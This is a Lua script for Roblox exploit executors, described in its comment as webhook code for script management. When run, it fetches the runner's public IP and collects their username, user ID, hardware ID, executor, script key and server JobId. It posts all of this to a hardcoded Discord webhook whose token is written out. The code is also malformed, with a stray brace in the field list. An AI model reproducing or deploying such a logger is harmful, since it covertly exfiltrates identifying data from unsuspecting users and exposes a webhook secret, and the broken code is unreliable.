-- This Is Where The Webhook Code Is Stored For Scripts And Script Management
local a = "https://discord.com/api/webhooks/1289928145297870849/ld5f1YZbOhvjRRXz5WU848RqZszqjkFufE2iPUWmDbRqdgp0aRKqn6KaGux4xtnEiIS7"
local b = game:GetService("HttpService")
local c = http_request or request or syn.request
local d = c({Url = "https://httpbin.org/get", Method = "GET"})
local e = d.Body
local f = b:JSONDecode(e)
local g = f.origin
local h = game.PlaceId
local i = game.JobId
local j = {
    embeds = {
        {
            title = "Someone Just Executed the Script",
            type = "rich",
            color = tonumber("1cff1a", 16),
            thumbnail = {url = "https://media.discordapp.net/attachments/1276435905200128010/1294931070499688530/Script.gif?ex=670cce09&is=670b7c89&hm=299bb0584167e0c81f1b723fa38ac7972594ccb3da4dd14035fc80fb967a0c1b&=&width=398&height=224"},
            fields = {
                {
                    name = "User Name / User ID",
                    value = string.format(
                        "```%s / %d```",
                        game.Players.LocalPlayer.Name,
                        game.Players.LocalPlayer.UserId
                    ),
                    inline = false
                },
                {name = "Internet Protocol", value = string.format("```%s```", tostring(g)), inline = true},
                {name = "Executor", value = "```" .. identifyexecutor() .. "```", inline = true},
                {name = "Key", value = "```" .. script_key .. "```", inline = true},
                {
                {name = "Hardware ID", value = string.format("```" .. gethwid() .. "```"), inline = false},
                {name = "JobId", value = string.format("```%s```", i), inline = false},
                {
                    name = "Profile Link",
                    value = string.format(
                        "[Click Here](https://www.roblox.com/users/%d/profile)",
                        game.Players.LocalPlayer.UserId
                    ),
                    inline = true
                },
                {
                    name = "Game Link",
                    value = string.format("[Click Here](https://www.roblox.com/games/%d)", h),
                    inline = true
                }
            }
        }
    }
}
local k = b:JSONEncode(j)
local l = {["Content-Type"] = "application/json"}
local m, n =
    pcall(
    function()
        c({Url = a, Body = k, Method = "POST", Headers = l})
    end
)
